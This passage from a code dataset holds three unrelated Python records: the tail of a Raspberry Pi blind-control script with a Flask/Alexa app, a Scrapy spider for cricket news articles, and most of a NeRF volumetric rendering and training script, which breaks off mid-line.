if status.value == True:\n print(\"true ting\")\n #current_elevation, dawn_elevation, dusk_elevation = get_elevation()\n #if current_elevation < dawn_elevation or current_elevation < dusk_aacelevation:\n # print(\"it is early morning or night \", current_elevation)\n # pwm.set_servo_pulsewidth( servo, 500 ) ;\n #elif current_elevation > dawn_elevation or current_elevation > dusk_elevation:\n # print(\"it is daytime \", current_elevation)\n # pwm.set_servo_pulsewidth( servo, 2500 ) ;\n if status.value == False:\n print(\"false ting\")\n time.sleep(1)\"\"\"\n\n\nif __name__=='__main__':\n \n #recording_on=Value('b', True)\n #p = Process (target=automate, args=(recording_on,))\n #p.start()\n app.run(debug=True,use_reloader=False)\n #p.join()\n\n\"\"\"\n\n \n\n#if the current elevation is less than dawn or dusk, then servo should be drivenn till endstop 1 active\n#if the current elevation is anything else, then servo should be driven till endstop 2 active\n#if the servo has been on for more than x amount of time, shut it down.\ntry:\n while True:\n current_elevation, dawn_elevation, dusk_elevation = get_elevation()\n #if GPIO.input(LimitSwitchShut):\n if current_elevation < dawn_elevation or current_elevation < dusk_aacelevation:\n print(\"it is early morning or night \", current_elevation)\n #if GPIO.input(LimitSwitchShut):\n pwm.set_servo_pulsewidth( servo, 500 ) ;\n time.sleep(1)\n #else:\n pwm.set_PWM_dutycycle(servo, 0);\n #pwm.set_PWM_freqduency( servo, 0 );\n elif current_elevation > dawn_elevation or current_elevation > dusk_elevation:\n #print(\"it is daytime \", current_elevation)\n #if GPIO.input(LimitSwitchOpen):\n pwm.set_servo_pulsewidth( servo, 2500 ) ;\n time.sleep(1)\n #else:\n pwm.set_PWM_dutycycle(servo, 0);\n #pwm.set_PWM_frequency( servo, 0 );\nexcept KeyboardInterrupt:\n print(\"interrupted\")\n pwm.set_PWM_dutycycle(servo, 0)\n pwm.set_PWM_frequency( servo, 0 )\n #pwm.set_PWM_dutycycle(servo, 0)\n #pwm.set_PWM_frequency( servo, 0 )\"\"\"\n\n\n\n", "repo_name": "ShafaeAli/Bedroom-Lighting-Future", "sub_path": "circadian_rhythm/pi4_sunset_blinds/blinds_alexa.py", "file_name": "blinds_alexa.py", "file_ext": "py", "file_size_in_byte": 4720, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "RPi.GPIO.setmode", "line_number": 20, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 20, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pigpio.pi", "line_number": 30, "usage_type": "call"}, {"api_name": "pigpio.OUTPUT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "astral.LocationInfo", "line_number": 38, "usage_type": "call"}, {"api_name": "astral.sun.sun", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 53, "usage_type": "call"}, {"api_name": "flask_ask.Ask", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "flask_ask.statement", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "36544091854", "text": "import scrapy\nfrom datetime import datetime\n\n\nclass CricketSpider(scrapy.Spider):\n name = \"cricket\"\n start_urls = [\n 'https://indianexpress.com/section/sports/cricket/page/1/',\n ]\n\n def parse(self, response, **kwargs):\n today_news_end = False\n for news in response.css('div.articles'):\n result = {\n 'title': news.css('.title a::text').get(),\n 'date': news.css('.date::text').get(),\n 'a': news.css('.title a::attr(href)').get(),\n }\n if result['date'].split(',')[0].strip() != datetime.now().strftime('%B %d'):\n today_news_end = True\n break\n request = scrapy.http.Request(\n url=result['a'],\n callback=self.parse_details,\n meta={\"result\": result}\n )\n yield request\n\n next_page = response.css('a.next::attr(href)').get()\n if next_page is not None and not today_news_end:\n yield response.follow(next_page, callback=self.parse)\n\n def parse_details(self, response):\n result = response.meta.get('result')\n lis_of_string = response.css(\n ''' #pcl-full-content>p::text, \n #pcl-full-content>.ev-meter-content > p::text , \n .custom-caption+ p::text , \n .hlt-bot-text p~ p+ p::text , \n .ev-meter-content .ev-meter-content p::text '''\n ).getall()\n content = '\\n\\n'.join(lis_of_string)\n image_url = response.css('.custom-caption img::attr(src)').getall()\n\n for url in image_url:\n if '.jpg' in url:\n image_url = url\n break\n else:\n image_url = image_url[:1]\n\n result['content'] = content\n result['image_url'] = image_url\n\n yield dict(result)\n\n", "repo_name": "Parth971/Python-Material", "sub_path": "training tasks/SCRAPPING/scrapy/news_scrapy_project/tutorial/spiders/cricket.py", "file_name": "cricket.py", "file_ext": "py", "file_size_in_byte": 1850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "scrapy.Spider", "line_number": 5, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "scrapy.http.Request", "line_number": 22, "usage_type": "call"}, {"api_name": "scrapy.http", "line_number": 22, "usage_type": "attribute"}]}
+{"seq_id": "16500640899", "text": "import os, sys\nimport numpy as np\nimport imageio\nimport json\nimport random\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nif hasattr(sys.stderr, 'isatty') and sys.stderr.isatty():\n from tqdm import tqdm, trange\nelse:\n def tqdm(iterable, **kwargs): return iterable\n trange = range\n\nimport matplotlib.pyplot as plt\n\nfrom run_nerf_helpers import *\n\nfrom nerf_load.load_llff import load_llff_data\nfrom nerf_load.load_deepvoxels import load_dv_data\nfrom nerf_load.load_blender import load_blender_data\nfrom nerf_load.load_LINEMOD import load_LINEMOD_data\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nnp.random.seed(42)\nDEBUG = False\n\ndef set_rand_seed(seed):\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic=True\n\n\ndef batchify(fn, chunk):\n \"\"\"Constructs a version of 'fn' that applies to smaller batches.\n \"\"\"\n if chunk is None:\n return fn\n def ret(inputs):\n return torch.cat([fn(inputs[i:i+chunk]) for i in range(0, inputs.shape[0], chunk)], 0)\n return ret\n\n\ndef run_network(inputs, viewdirs, fn, embed_fn, embeddirs_fn, netchunk=1024*64):\n \"\"\"Prepares inputs and applies network 'fn'.\n \"\"\"\n inputs_flat = torch.reshape(inputs, [-1, inputs.shape[-1]])\n embedded = embed_fn(inputs_flat)\n\n if viewdirs is not None:\n input_dirs = viewdirs[:,None].expand(inputs.shape)\n input_dirs_flat = torch.reshape(input_dirs, [-1, input_dirs.shape[-1]])\n embedded_dirs = embeddirs_fn(input_dirs_flat)\n embedded = torch.cat([embedded, embedded_dirs], -1)\n\n outputs_flat = batchify(fn, netchunk)(embedded)\n outputs = torch.reshape(outputs_flat, list(inputs.shape[:-1]) + [outputs_flat.shape[-1]])\n return outputs\n\n\ndef batchify_rays(rays_flat, chunk=1024*32, **kwargs):\n \"\"\"Render rays in smaller minibatches to avoid OOM.\n \"\"\"\n all_ret = {}\n for i in range(0, rays_flat.shape[0], chunk):\n ret = render_rays(rays_flat[i:i+chunk], **kwargs)\n for k in ret:\n if k not in all_ret:\n all_ret[k] = []\n all_ret[k].append(ret[k])\n\n all_ret = {k : torch.cat(all_ret[k], 0) for k in all_ret}\n return all_ret\n\n\ndef render(H, W, K, chunk=1024*32, rays=None, c2w=None, ndc=True,\n near=0., far=1.,\n use_viewdirs=False, c2w_staticcam=None,\n time_step=None, bkgd_color=None,\n **kwargs):\n \"\"\"Render rays\n Args:\n H: int. Height of image in pixels.\n W: int. Width of image in pixels.\n focal: float. Focal length of pinhole camera.\n chunk: int. Maximum number of rays to process simultaneously. Used to\n control maximum memory usage. Does not affect final results.\n rays: array of shape [2, batch_size, 3]. Ray origin and direction for\n each example in batch.\n c2w: array of shape [3, 4]. Camera-to-world transformation matrix.\n ndc: bool. If True, represent ray origin, direction in NDC coordinates.\n near: float or array of shape [batch_size]. Nearest distance for a ray.\n far: float or array of shape [batch_size]. Farthest distance for a ray.\n use_viewdirs: bool. If True, use viewing direction of a point in space in model.\n c2w_staticcam: array of shape [3, 4]. If not None, use this transformation matrix for \n camera while using other c2w argument for viewing directions.\n Returns:\n rgb_map: [batch_size, 3]. Predicted RGB values for rays.\n disp_map: [batch_size]. Disparity map. Inverse of depth.\n acc_map: [batch_size]. Accumulated opacity (alpha) along a ray.\n extras: dict with everything returned by render_rays().\n \"\"\"\n if c2w is not None:\n # special case to render full image\n rays_o, rays_d = get_rays(H, W, K, c2w)\n else:\n # use provided ray batch\n rays_o, rays_d = rays\n\n if use_viewdirs:\n # provide ray directions as input\n viewdirs = rays_d\n if c2w_staticcam is not None:\n # special case to visualize effect of viewdirs\n rays_o, rays_d = get_rays(H, W, K, c2w_staticcam)\n viewdirs = viewdirs / torch.norm(viewdirs, dim=-1, keepdim=True)\n viewdirs = torch.reshape(viewdirs, [-1,3]).float()\n\n sh = rays_d.shape # [..., 3]\n if ndc:\n # for forward facing scenes\n rays_o, rays_d = ndc_rays(H, W, K[0][0], 1., rays_o, rays_d)\n\n # Create ray batch\n rays_o = torch.reshape(rays_o, [-1,3]).float()\n rays_d = torch.reshape(rays_d, [-1,3]).float()\n\n near, far = near * torch.ones_like(rays_d[...,:1]), far * torch.ones_like(rays_d[...,:1])\n rays = torch.cat([rays_o, rays_d, near, far], -1)\n if use_viewdirs:\n rays = torch.cat([rays, viewdirs], -1)\n\n if time_step != None:\n time_step = time_step.expand(list(rays.shape[0:-1]) + [1])\n # (ray origin, ray direction, min dist, max dist, normalized viewing direction, t)\n rays = torch.cat([rays, time_step], dim=-1)\n # Render and reshape\n all_ret = batchify_rays(rays, chunk, **kwargs)\n for k in all_ret:\n k_sh = list(sh[:-1]) + list(all_ret[k].shape[1:])\n all_ret[k] = torch.reshape(all_ret[k], k_sh)\n\n if bkgd_color is not None:\n torch_bkgd_color = torch.Tensor(bkgd_color).to(device)\n # rgb map for model: fine, coarse, merged, dynamic_fine, dynamic_coarse\n for _i in ['_map', '0', 'h1', 'h10', 'h2', 'h20']: # add background for synthetic scenes, for image-based supervision\n rgb_i, acc_i = 'rgb'+_i, 'acc'+_i\n if (rgb_i in all_ret) and (acc_i in all_ret):\n all_ret[rgb_i] = all_ret[rgb_i] + torch_bkgd_color*(1.-all_ret[acc_i][..., None])\n\n k_extract = ['rgb_map', 'disp_map', 'acc_map']\n ret_list = [all_ret[k] for k in k_extract]\n ret_dict = {k : all_ret[k] for k in all_ret if k not in k_extract}\n return ret_list + [ret_dict]\n\n\ndef render_path(render_poses, hwf, K, chunk, render_kwargs, gt_imgs=None, savedir=None, render_factor=0, render_steps=None, bkgd_color=None):\n\n H, W, focal = hwf\n\n if render_factor!=0:\n # Render downsampled for speed\n H = H//render_factor\n W = W//render_factor\n focal = focal/render_factor\n\n rgbs = []\n disps = []\n\n t = time.time()\n cur_timestep = None\n for i, c2w in enumerate(tqdm(render_poses)):\n print(i, time.time() - t)\n if render_steps is not None:\n cur_timestep = render_steps[i]\n t = time.time()\n rgb, disp, acc, extras = render(H, W, K, chunk=chunk, c2w=c2w[:3,:4], time_step=cur_timestep, bkgd_color=bkgd_color, **render_kwargs)\n rgbs.append(rgb.cpu().numpy())\n disps.append(disp.cpu().numpy())\n if i==0:\n print(rgb.shape, disp.shape)\n\n \"\"\"\n if gt_imgs is not None and render_factor==0:\n p = -10. * np.log10(np.mean(np.square(rgb.cpu().numpy() - gt_imgs[i])))\n print(p)\n \"\"\"\n\n if savedir is not None:\n rgb8 = to8b(rgbs[-1])\n filename = os.path.join(savedir, '{:03d}.png'.format(i))\n imageio.imwrite(filename, rgb8)\n\n other_rgbs = []\n if gt_imgs is not None:\n other_rgbs.append(gt_imgs[i])\n for rgb_i in ['rgbh1','rgbh2','rgb0']: \n if rgb_i in extras:\n _data = extras[rgb_i].cpu().numpy()\n other_rgbs.append(_data)\n if len(other_rgbs) >= 1:\n other_rgb8 = np.concatenate(other_rgbs, axis=1)\n other_rgb8 = to8b(other_rgb8)\n filename = os.path.join(savedir, '_{:03d}.png'.format(i))\n imageio.imwrite(filename, other_rgb8)\n\n rgbs = np.stack(rgbs, 0)\n disps = np.stack(disps, 0)\n\n return rgbs, disps\n\n\ndef create_nerf(args, vel_model=None, bbox_model=None, ndim=3):\n \"\"\"Instantiate NeRF's MLP model.\n \"\"\"\n embed_fn, input_ch = get_embedder(args.multires, args.i_embed, ndim)\n\n input_ch_views = 0\n embeddirs_fn = None\n if args.use_viewdirs:\n embeddirs_fn, input_ch_views = get_embedder(args.multires_views, args.i_embed, dim=ndim)\n output_ch = 4 # 5 if args.N_importance > 0 else 4\n skips = [4]\n\n my_model_dict = {\n \"nerf\":NeRF,\n \"siren\":SIREN_NeRFt,\n \"hybrid\":SIREN_Hybrid,\n }\n model_args = {}\n if args.fading_layers > 0:\n if args.net_model == \"siren\":\n model_args[\"fading_fin_step\"] = args.fading_layers\n elif args.net_model == \"hybrid\":\n model_args[\"fading_fin_step_static\"] = args.fading_layers\n model_args[\"fading_fin_step_dynamic\"] = args.fading_layers\n if bbox_model is not None:\n model_args[\"bbox_model\"] = bbox_model\n\n my_model = my_model_dict[args.net_model]\n\n model = my_model(D=args.netdepth, W=args.netwidth,\n input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs, **model_args)\n if args.net_model == \"hybrid\":\n model.toDevice(device)\n model = model.to(device)\n \n grad_vars = list(model.parameters())\n\n model_fine = None\n if args.N_importance > 0:\n model_fine = my_model(D=args.netdepth_fine, W=args.netwidth_fine,\n input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs, **model_args)\n if args.net_model == \"hybrid\":\n model_fine.toDevice(device)\n model_fine = model_fine.to(device)\n grad_vars += list(model_fine.parameters())\n\n network_query_fn = lambda inputs, viewdirs, network_fn : run_network(inputs, viewdirs, network_fn,\n embed_fn=embed_fn,\n embeddirs_fn=embeddirs_fn,\n netchunk=args.netchunk)\n\n # Create optimizer\n optimizer = torch.optim.Adam(params=grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n vel_optimizer = None\n if vel_model is not None:\n vel_grad_vars = list(vel_model.parameters())\n vel_optimizer = torch.optim.Adam(params=vel_grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n\n start = 0\n basedir = args.basedir\n expname = args.expname\n\n ##########################\n # Load checkpoints\n if args.ft_path is not None and args.ft_path!='None':\n ckpts = [args.ft_path]\n else:\n ckpts = [os.path.join(basedir, expname, f) for f in sorted(os.listdir(os.path.join(basedir, expname))) if 'tar' in f]\n\n print('Found ckpts', ckpts)\n if len(ckpts) > 0 and not args.no_reload:\n ckpt_path = ckpts[-1]\n print('Reloading from', ckpt_path)\n ckpt = torch.load(ckpt_path)\n\n start = ckpt['global_step']\n optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n \n # Load model\n if args.net_model == \"hybrid\":\n model.static_model.load_state_dict(ckpt['network_fn_state_dict_static'])\n if model_fine is not None:\n model_fine.static_model.load_state_dict(ckpt['network_fine_state_dict_static'])\n model.dynamic_model.load_state_dict(ckpt['network_fn_state_dict_dynamic'])\n if model_fine is not None:\n model_fine.dynamic_model.load_state_dict(ckpt['network_fine_state_dict_dynamic'])\n else:\n model.load_state_dict(ckpt['network_fn_state_dict'])\n if model_fine is not None:\n model_fine.load_state_dict(ckpt['network_fine_state_dict'])\n \n if vel_model is not None:\n if 'network_vel_state_dict' in ckpt:\n vel_model.load_state_dict(ckpt['network_vel_state_dict'])\n if vel_optimizer is not None:\n if 'vel_optimizer_state_dict' in ckpt:\n vel_optimizer.load_state_dict(ckpt['vel_optimizer_state_dict'])\n ##########################\n\n render_kwargs_train = {\n 'network_query_fn' : network_query_fn,\n 'perturb' : args.perturb,\n 'N_importance' : args.N_importance,\n 'network_fine' : model_fine,\n 'N_samples' : args.N_samples,\n 'network_fn' : model,\n 'use_viewdirs' : args.use_viewdirs,\n 'raw_noise_std' : args.raw_noise_std,\n }\n\n # NDC only good for LLFF-style forward facing data\n if args.dataset_type != 'llff' or args.no_ndc:\n print('Not ndc!')\n render_kwargs_train['ndc'] = False\n render_kwargs_train['lindisp'] = args.lindisp\n\n render_kwargs_test = {k : render_kwargs_train[k] for k in render_kwargs_train}\n render_kwargs_test['perturb'] = False\n render_kwargs_test['raw_noise_std'] = 0.\n\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer, vel_optimizer\n\n\ndef raw2outputs(raw_list, z_vals, rays_d, raw_noise_std=0, pytest=False, remove99=False):\n \"\"\"Transforms model's predictions to semantically meaningful values.\n Args:\n raw_list: a list of tensors in shape [num_rays, num_samples along ray, 4]. Prediction from model.\n z_vals: [num_rays, num_samples along ray]. Integration time.\n rays_d: [num_rays, 3]. Direction of each ray.\n Returns:\n rgb_map: [num_rays, 3]. Estimated RGB color of a ray.\n disp_map: [num_rays]. Disparity map. Inverse of depth map.\n acc_map: [num_rays]. Sum of weights along each ray.\n weights: [num_rays, num_samples]. Weights assigned to each sampled color.\n depth_map: [num_rays]. Estimated distance to object.\n \"\"\"\n raw2alpha = lambda raw, dists, act_fn=F.relu: 1.-torch.exp(-act_fn(raw)*dists)\n\n dists = z_vals[...,1:] - z_vals[...,:-1]\n dists = torch.cat([dists, torch.Tensor([1e10]).expand(dists[...,:1].shape)], -1) # [N_rays, N_samples]\n\n dists = dists * torch.norm(rays_d[...,None,:], dim=-1)\n\n noise = 0.\n alpha_list = []\n color_list = []\n for raw in raw_list:\n if raw is None: continue\n if raw_noise_std > 0.:\n noise = torch.randn(raw[...,3].shape) * raw_noise_std\n\n # Overwrite randomly sampled data if pytest\n if pytest:\n np.random.seed(42)\n noise = np.random.rand(*list(raw[...,3].shape)) * raw_noise_std\n noise = torch.Tensor(noise)\n \n alpha = raw2alpha(raw[...,3] + noise, dists) # [N_rays, N_samples]\n if remove99:\n alpha = torch.where(alpha > 0.99, torch.zeros_like(alpha), alpha)\n rgb = torch.sigmoid(raw[..., :3]) # [N_rays, N_samples, 3]\n\n alpha_list += [alpha]\n color_list += [rgb]\n \n densTiStack = torch.stack([1.-alpha for alpha in alpha_list], dim=-1) \n # [N_rays, N_samples, N_raws]\n densTi = torch.prod(densTiStack, dim=-1, keepdim=True) \n # [N_rays, N_samples]\n densTi_all = torch.cat([densTiStack, densTi], dim=-1) \n # [N_rays, N_samples, N_raws + 1] \n Ti_all = torch.cumprod(densTi_all + 1e-10, dim=-2) # accu along samples\n Ti_all = Ti_all / (densTi_all + 1e-10)\n # [N_rays, N_samples, N_raws + 1], exclusive\n weights_list = [alpha * Ti_all[...,-1] for alpha in alpha_list] # a list of [N_rays, N_samples]\n self_weights_list = [alpha_list[alpha_i] * Ti_all[...,alpha_i] for alpha_i in range(len(alpha_list))] # a list of [N_rays, N_samples]\n\n def weighted_sum_of_samples(wei_list, content_list=None, content=None):\n content_map_list = []\n if content_list is not None:\n content_map_list = [\n torch.sum(weights[..., None] * ct, dim=-2) \n # [N_rays, N_content], weighted sum along samples\n for weights, ct in zip(wei_list, content_list)\n ]\n elif content is not None:\n content_map_list = [\n torch.sum(weights * content, dim=-1) \n # [N_rays], weighted sum along samples\n for weights in wei_list\n ]\n content_map = torch.stack(content_map_list, dim=-1) \n # [N_rays, (N_contentlist,) N_raws]\n content_sum = torch.sum(content_map, dim=-1) \n # [N_rays, (N_contentlist,)]\n return content_sum, content_map\n\n rgb_map, _ = weighted_sum_of_samples(weights_list, color_list) # [N_rays, 3]\n # Sum of weights along each ray. This value is in [0, 1] up to numerical error.\n acc_map, _ = weighted_sum_of_samples(weights_list, None, 1) # [N_rays]\n\n _, rgb_map_stack = weighted_sum_of_samples(self_weights_list, color_list)\n _, acc_map_stack = weighted_sum_of_samples(self_weights_list, None, 1)\n\n # Estimated depth map is expected distance.\n # Disparity map is inverse depth.\n depth_map,_ = weighted_sum_of_samples(weights_list, None, z_vals) # [N_rays]\n disp_map = 1./torch.max(1e-10 * torch.ones_like(depth_map), depth_map / acc_map)\n # alpha * Ti\n weights = (1.-densTi)[...,0] * Ti_all[...,-1] # [N_rays, N_samples]\n \n # weights = alpha * torch.cumprod(torch.cat([torch.ones((alpha.shape[0], 1)), 1.-alpha + 1e-10], -1), -1)[:, :-1]\n # rgb_map = torch.sum(weights[...,None] * rgb, -2) # [N_rays, 3]\n # depth_map = torch.sum(weights * z_vals, -1)\n # acc_map = torch.sum(weights, -1)\n\n return rgb_map, disp_map, acc_map, weights, depth_map, Ti_all[...,-1], rgb_map_stack, acc_map_stack\n\n\ndef render_rays(ray_batch,\n network_fn,\n network_query_fn,\n N_samples,\n retraw=False,\n lindisp=False,\n perturb=0.,\n N_importance=0,\n network_fine=None,\n raw_noise_std=0.,\n verbose=False,\n pytest=False,\n has_t = False,\n vel_model=None,\n netchunk=1024*64,\n warp_fading_dt=None,\n warp_mod=\"rand\",\n remove99=False):\n \"\"\"Volumetric rendering.\n Args:\n ray_batch: array of shape [batch_size, ...]. All information necessary\n for sampling along a ray, including: ray origin, ray direction, min\n dist, max dist, and unit-magnitude viewing direction.\n network_fn: function. Model for predicting RGB and density at each point\n in space.\n network_query_fn: function used for passing queries to network_fn.\n N_samples: int. Number of different times to sample along each ray.\n retraw: bool. If True, include model's raw, unprocessed predictions.\n lindisp: bool. If True, sample linearly in inverse depth rather than in depth.\n perturb: float, 0 or 1. If non-zero, each ray is sampled at stratified\n random points in time.\n N_importance: int. Number of additional times to sample along each ray.\n These samples are only passed to network_fine.\n network_fine: \"fine\" network with same spec as network_fn.\n raw_noise_std: ...\n verbose: bool. If True, print more debugging info.\n\n warp_fading_dt, to train nearby frames with flow-based warping, fading*delt_t\n Returns:\n rgb_map: [num_rays, 3]. Estimated RGB color of a ray. Comes from fine model.\n disp_map: [num_rays]. Disparity map. 1 / depth.\n acc_map: [num_rays]. Accumulated opacity along each ray. Comes from fine model.\n raw: [num_rays, num_samples, 4]. Raw predictions from model.\n rgb0: See rgb_map. Output for coarse model.\n disp0: See disp_map. Output for coarse model.\n acc0: See acc_map. Output for coarse model.\n z_std: [num_rays]. Standard deviation of distances along ray for each\n sample.\n \"\"\"\n N_rays = ray_batch.shape[0]\n rays_o, rays_d = ray_batch[:,0:3], ray_batch[:,3:6] # [N_rays, 3] each\n rays_t, viewdirs = None, None\n if has_t:\n rays_t = ray_batch[:,-1:] # [N_rays, 1]\n viewdirs = ray_batch[:, -4:-1] if ray_batch.shape[-1] > 9 else None\n elif ray_batch.shape[-1] > 8:\n viewdirs = ray_batch[:,-3:]\n\n bounds = torch.reshape(ray_batch[...,6:8], [-1,1,2])\n near, far = bounds[...,0], bounds[...,1] # [-1,1]\n\n t_vals = torch.linspace(0., 1., steps=N_samples)\n if not lindisp:\n z_vals = near * (1.-t_vals) + far * (t_vals)\n else:\n z_vals = 1./(1./near * (1.-t_vals) + 1./far * (t_vals))\n\n z_vals = z_vals.expand([N_rays, N_samples])\n\n if perturb > 0.:\n # get intervals between samples\n mids = .5 * (z_vals[...,1:] + z_vals[...,:-1])\n upper = torch.cat([mids, z_vals[...,-1:]], -1)\n lower = torch.cat([z_vals[...,:1], mids], -1)\n # stratified samples in those intervals\n t_rand = torch.rand(z_vals.shape)\n\n # Pytest, overwrite u with numpy's fixed random numbers\n if pytest:\n np.random.seed(42)\n t_rand = np.random.rand(*list(z_vals.shape))\n t_rand = torch.Tensor(t_rand)\n\n z_vals = lower + (upper - lower) * t_rand\n\n pts = rays_o[...,None,:] + rays_d[...,None,:] * z_vals[...,:,None] # [N_rays, N_samples, 3]\n if rays_t is not None:\n rays_t_bc = torch.reshape(rays_t, [-1,1,1]).expand([N_rays, N_samples, 1])\n pts = torch.cat([pts, rays_t_bc], dim = -1)\n\n def warp_raw_random(orig_pts, orig_dir, fading, fn, mod=\"rand\", has_t=has_t):\n # mod, \"rand\", \"forw\", \"back\", \"none\"\n if (not has_t) or (mod==\"none\") or (vel_model is None):\n orig_raw = network_query_fn(orig_pts, orig_dir, fn) # [N_rays, N_samples, 4]\n return orig_raw\n\n orig_pos, orig_t = torch.split(orig_pts, [3, 1], -1)\n \n _vel = batchify(vel_model, netchunk)(orig_pts.view(-1,4))\n _vel = torch.reshape(_vel, [N_rays, -1, 3])\n # _vel.shape, [N_rays, N_samples(+N_importance), 3]\n if mod==\"rand\":\n # random_warpT = np.random.normal(0.0, 0.6, orig_t.get_shape().as_list())\n # random_warpT = np.random.uniform(-3.0, 3.0, orig_t.shape)\n random_warpT = torch.rand(orig_t.shape)*6.0 -3.0 # [-3,3]\n else:\n random_warpT = 1.0 if mod == \"back\" else (-1.0) # back\n # mean and standard deviation: 0.0, 0.6, so that 3sigma < 2, train +/- 2*delta_T\n random_warpT = random_warpT * fading\n random_warpT = torch.Tensor(random_warpT)\n\n warp_t = orig_t + random_warpT\n warp_pos = orig_pos + _vel * random_warpT\n warp_pts = torch.cat([warp_pos, warp_t], dim = -1)\n warp_pts = warp_pts.detach() # stop gradiant\n\n warped_raw = network_query_fn(warp_pts, orig_dir, fn) # [N_rays, N_samples, 4]\n\n return warped_raw\n\n def get_raw(fn, staticpts, staticdirs, has_t=has_t):\n static_raw, smoke_raw = None, None\n smoke_warp_mod = warp_mod\n if (None in [vel_model, warp_fading_dt]) or (not has_t):\n smoke_warp_mod = \"none\"\n \n smoke_raw = warp_raw_random(staticpts, staticdirs, warp_fading_dt, fn, mod=smoke_warp_mod, has_t=has_t)\n if has_t and (smoke_raw.shape[-1] > 4): # hybrid mode\n if smoke_warp_mod == \"none\":\n static_raw = smoke_raw\n else:\n static_raw = warp_raw_random(staticpts, staticdirs, warp_fading_dt, fn, mod=\"none\", has_t=True)\n\n static_raw = static_raw[..., :4]\n smoke_raw = smoke_raw[..., -4:]\n \n return smoke_raw, static_raw # [N_rays, N_samples, 4], [N_rays, N_samples, 4]\n\n # raw = run_network(pts)\n C_smokeRaw, C_staticRaw = get_raw(network_fn, pts, viewdirs)\n raw = [C_smokeRaw, C_staticRaw]\n rgb_map, disp_map, acc_map, weights, depth_map, ti_map, rgb_map_stack, acc_map_stack = raw2outputs(raw, z_vals, rays_d, raw_noise_std, pytest=pytest, remove99=remove99)\n\n if raw[-1] is not None:\n rgbh2_map = rgb_map_stack[...,0] # dynamic\n acch2_map = acc_map_stack[...,0] # dynamic\n rgbh1_map = rgb_map_stack[...,1] # staitc\n acch1_map = acc_map_stack[...,1] # staitc\n \n # raw = network_query_fn(pts, viewdirs, network_fn)\n # rgb_map, disp_map, acc_map, weights, depth_map = raw2outputs(raw, z_vals, rays_d, raw_noise_std, white_bkgd, pytest=pytest)\n\n if N_importance > 0:\n\n rgb_map_0, disp_map_0, acc_map_0 = rgb_map, disp_map, acc_map\n\n z_vals_mid = .5 * (z_vals[...,1:] + z_vals[...,:-1])\n z_samples = sample_pdf(z_vals_mid, weights[...,1:-1], N_importance, det=(perturb==0.), pytest=pytest)\n z_samples = z_samples.detach()\n\n z_vals, _ = torch.sort(torch.cat([z_vals, z_samples], -1), -1)\n pts = rays_o[...,None,:] + rays_d[...,None,:] * z_vals[...,:,None] # [N_rays, N_samples + N_importance, 3]\n\n if rays_t is not None:\n rays_t_bc = torch.reshape(rays_t, [-1,1,1]).expand([N_rays, N_samples+N_importance, 1])\n pts = torch.cat([pts, rays_t_bc], dim = -1)\n \n run_fn = network_fn if network_fine is None else network_fine\n F_smokeRaw, F_staticRaw = get_raw(run_fn, pts, viewdirs)\n raw = [F_smokeRaw, F_staticRaw]\n\n rgb_map, disp_map, acc_map, weights, depth_map, ti_map, rgb_map_stack, acc_map_stack = raw2outputs(raw, z_vals, rays_d, raw_noise_std, pytest=pytest, remove99=remove99)\n\n if raw[-1] is not None:\n rgbh20_map = rgbh2_map\n acch20_map = acch2_map\n rgbh10_map = rgbh1_map\n acch10_map = acch1_map\n rgbh2_map = rgb_map_stack[...,0]\n acch2_map = acc_map_stack[...,0]\n rgbh1_map = rgb_map_stack[...,1]\n acch1_map = acc_map_stack[...,1]\n \n # raw = run_network(pts, fn=run_fn)\n # raw = network_query_fn(pts, viewdirs, run_fn)\n # rgb_map, disp_map, acc_map, weights, depth_map = raw2outputs(raw, z_vals, rays_d, raw_noise_std, white_bkgd, pytest=pytest)\n\n ret = {'rgb_map' : rgb_map, 'disp_map' : disp_map, 'acc_map' : acc_map}\n if retraw:\n ret['raw'] = raw[0]\n if raw[1] is not None:\n ret['raw_static'] = raw[1]\n if N_importance > 0:\n ret['rgb0'] = rgb_map_0\n ret['disp0'] = disp_map_0\n ret['acc0'] = acc_map_0\n ret['z_std'] = torch.std(z_samples, dim=-1, unbiased=False) # [N_rays]\n \n if raw[-1] is not None:\n ret['rgbh1'] = rgbh1_map\n ret['acch1'] = acch1_map\n ret['rgbh2'] = rgbh2_map\n ret['acch2'] = acch2_map\n if N_importance > 0:\n ret['rgbh10'] = rgbh10_map\n ret['acch10'] = acch10_map\n ret['rgbh20'] = rgbh20_map\n ret['acch20'] = acch20_map\n ret['rgbM'] = rgbh1_map * 0.5 + rgbh2_map * 0.5\n\n for k in ret:\n if (torch.isnan(ret[k]).any() or torch.isinf(ret[k]).any()) and DEBUG:\n print(f\"! 